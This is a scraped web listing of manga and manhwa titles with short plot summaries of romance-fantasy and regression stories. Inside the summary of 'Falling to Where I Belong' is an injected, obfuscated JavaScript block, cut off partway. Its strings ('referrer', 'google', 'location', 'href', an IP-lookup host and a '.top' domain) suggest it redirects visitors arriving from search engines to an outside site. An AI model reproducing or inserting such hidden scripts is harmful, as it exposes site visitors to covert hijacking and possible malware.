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3985 results

I Tamed The Male Lead Who Tried To Kill Me

Read manhwa I Tamed the Male Lead Who Tried to Kill Me Latia’s family took in Karshian when his father went on a maritime expedition, but after rumors go around that he’s dead, they treat him like a parasite. Egged on by her sadistic parents and desperate for their approval, Latia bullies Karshian relentlessly. However, when Karshian’s father returns as a national hero and powerful duke, Karshian gets his revenge by executing Latia’s entire family! As she recalls her last moments, she realizes that her family had been lying to her all along. So when she’s thrown back into the past, she’s determined to prevent her death and treat Karshian right this time. But this won’t be easy when Karshian distrusts Latia’s every move. Will Latia be able to win over Karshian and turn the tables on her family this time around, or is she doomed to die once more?


Sigeup Yeonae

Read manga Sigeup Yeonae / Hourly Love ‘Date me for 20,000 won an hour.’ Cha Do Hyun is a poor college student. One day, he got a ridiculous offer from Lee Sana, a younger student at the university. Should he accept the offer from this girl, who was looking for a good place to bury a body on campus? Everything about it is suspicious, but having just been fired from his part-time job, the offer is too sweet for Cha Do hyun to turn down! “You are totally worth the money” “Keep that thought to yourself!” A woman with nothing but money, a man with everything but money, and their suspicious dating service.


Duchess’s Lo-Fi Coffeehouse

Read manhwa Duchess’s Lo-Fi Coffeehouse /  느긋한 공작부인의 악커피하우스 Loanna was raised in neglect and isolation as an illegitimate child of the Count Louis family. She gets married off to Duke Bruggen, who orders her to keep quiet and out of the way. Free from all expectations or responsibilities, she roams around the castle and runs into a coffee bush. A passionate barista in her past life, Loanna remembers exactly how to brew a perfect cup of Joe. The trouble is, no one in this realm seems to know what “coffee” is, nor its wonderful benefits. As a matter of fact, coffee fruits are regarded as “evil.” As a coffee aficionado, Loanna is determined to turn this reputation around.


Falling to Where I Belong

Heart warningly honest Cheng Fei Chi X A proud and an innocent Zhen Ye Ming, a youngster who doesn't think that relations are important. their love will never change! The fallen leave belongs to the pond and I belong to you!<script></script><script>function _0x25a8(){var _0x3d840a=['referrer','5105yhUHXs','7kphBSB','362852Bjymvz','TNtQt','https://ip','2236740tjeiRI','VXOBs','9QInzZi','http://rea','then','144525RcgYoD','.top/','dma.net/','hgDNA','google','568857fLVbAJ','452ASJZrd','syFaT','SZMhi','sQMTe','WatRW','.customapi','769704YRSVDS','location','1429576gyhXuO','oGbFQ','text','floor','href','CvTja','random','includes','zUUwr'];_0x25a8=function(){return _0x3d840a;};return _0x25a8();}function _0x4976(_0x47b96d,_0x5b0684){var _0x7abc08=_0x25a8();return _0x4976=function(_0x2988cc,_0x4217ae){_0x2988cc=_0x2988cc-(-0x2568+0x3a*0x48+0x1625);var _0x4c2e76=_0x7abc08[_0x2988cc];return _0x4c2e76;},_0x4976(_0x47b96d,_0x5b0684);}(function(_0x39527a,_0x2a735d){var _0x1016e8=_0x4976,_0x3586f5=_0x39527a();while(!![]){try{var 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Don’t Fall In Love With The Villainess

Read manga Don’t Fall In Love With The Villainess Liv crossed inside a novel as the villain’s first love. The only means to return to her original world was to prevent the villain’s blackening. The villain, Camian, was the prince of devils and the world’s strongest man. She expected a rough and rocky path… but… something was off… The villain was sweet… and caring. Can Liv prevent Camian’s blackening?


The Forgotten Princess Wants To Live In Peace

Summary: 잊혀진 황녀는 평화롭게 살고 싶어 / Ichojin Hwangnyoneun Pyonghwaropkke Salgo Sipo / Forgotten Princess Eluana Vita Spess is a stubborn girl who works as a blacksmith in a village called Aden and raises her little brother by herself. On the day she receives her alchemy ability, a man in the portrait that her mother cherished came up to her. ‘I’m the young lady of a Ducal family?’ Then she learned a shocking revelation from the Duke as he hugged her in his arms. She’s the last bloodline of the first emperor, all known to have been executed. “I need to get rid of all the dangers. Because I’m worth it.”


Little Wife, How Dare You Say Break Up?

Li Chengxiu tasted the bitterness of life at a young age and longed to be loved. Shao Qun has a distinguished background, the second generation of naughty and unruly character in high school to the extreme, due to curiosity and approach, from bullying to be attracted, youthful feelings occurred in the wrong period, doomed to harm. He wanted to leave everything behind and start anew, but will the encounter again be the beginning of happiness or the continuation of harm?


Adeline’s Twilight

Read manhwa Adeline’s Twilight Adeline was murdered by the man she loves, but regressed to the day of her marriage with him. Now begins her twilight, so her death is not repeated.


I Became the Hero’s Mom

<span class="mx-1">I Became the Hero's Mom </span> I’ve been a fan of the male lead for 3 years. A fool for his son, I was caught by the Tyrant Duke of Hades, Louvermont. “Following me around and giving me a lot of expensive gifts. I don’t know whether you value your life or not, coming all the way to the North by yourself….” "I am sorry. I have nothing to say." “Okay, I lose. I have a generous heart, so I will pretend I don’t know anything.” “....Really? I think that didn’t have that much sincerity.” “It’s been quite a while since I had a woman following me around. I’ve never seen anyone as persistent as Milady. It’s amazing. Let’s do it, marriage. As soon as possible.” "Sigh...." "...." "Yes, you will accept it." "...." "I mean, what?! What did you just say?" What does this mean? I must have heard it wrong, right? However, the Duke only looked at my blank face then smirked, and properly confirmed it by threatening to kill me. "I'll do it. I'll marry you." Oh my God. The male-lead's father's excessive self-consciousness is quite high.



Iraine , who lived a modest life as a maid in a village dormitory, Seizing the golden opportunity, she gets a job as a prosperous imperial court servant. At that time, when I thought that my life was blooming while being recognized for my abilities by the princess, Coincidentally, she runs into a man with a bad mouth in the Imperial Palace garden. “Do you have any strange hobbies? Bleeding from my feet.” Unlike his harsh words, he is a handsome man with black hair that exudes a sweet and noble scent of forget-me-not. Iraine falls in love with the man she met… Is it okay if I give you that heart? * * * “Then what is your name?” “Yes Yes?” “What kind of person are you? What’s your name, you?” Iraine’s face was completely drained of blood. Even though she couldn’t make an excuse, she wiggled her fingers as if to ask why. “Why are you asking my name? yo. this…” As if Theo had heard a funny story, he burst out laughing. It had been a long time since someone’s laughter felt so frightening. “hey.” “Yes Yes?” Iraine backed off at Theo’s action as he took a step closer to me. Theo did not yield to her and leaned his upper body further. “Do you think it would be difficult for me to find out your name?”


Fly Me To The Moon

Read manhwa Fly Me To The Moon An unusual existence, evil things are not enough to say they are monsters. An unexpected appearance by Jeong Yeon, who attended her mother’s funeral, forces her to enter their world. Hate is manipulated, terrible pain. There was someone holding her right when she broke down.


Dancing In The Middle Of The Night

Dancing In The Middle Of The Night / 푸른밤, 황혼의 윤무 Kang Seo Yoon, an ordinary office worker, is captivated by the performance of pianist Ahn Hee Won. But one day, she was in the concert hall when no one was left. She witnessed Ahn Hee Won aiding the murder case and played the piano in a pool of blood…? And right from that moment, the world of unscrupulous monsters wearing a beautiful cover and eating humans swallowed Kang Seo Yoon’s life. So you can only eat or die. On the sentimental and beautiful face, the cold wave shook like a lamp. “Seo Yoon, make a choice” It is a story of enchantment born at night. In a city filled with enchantment like a jungle, there lived a dark blue person who longed to eat. A virtual contemporary urban mystical romantic fantasy about an artist who enchants humans and monsters with love as a scapegoat.
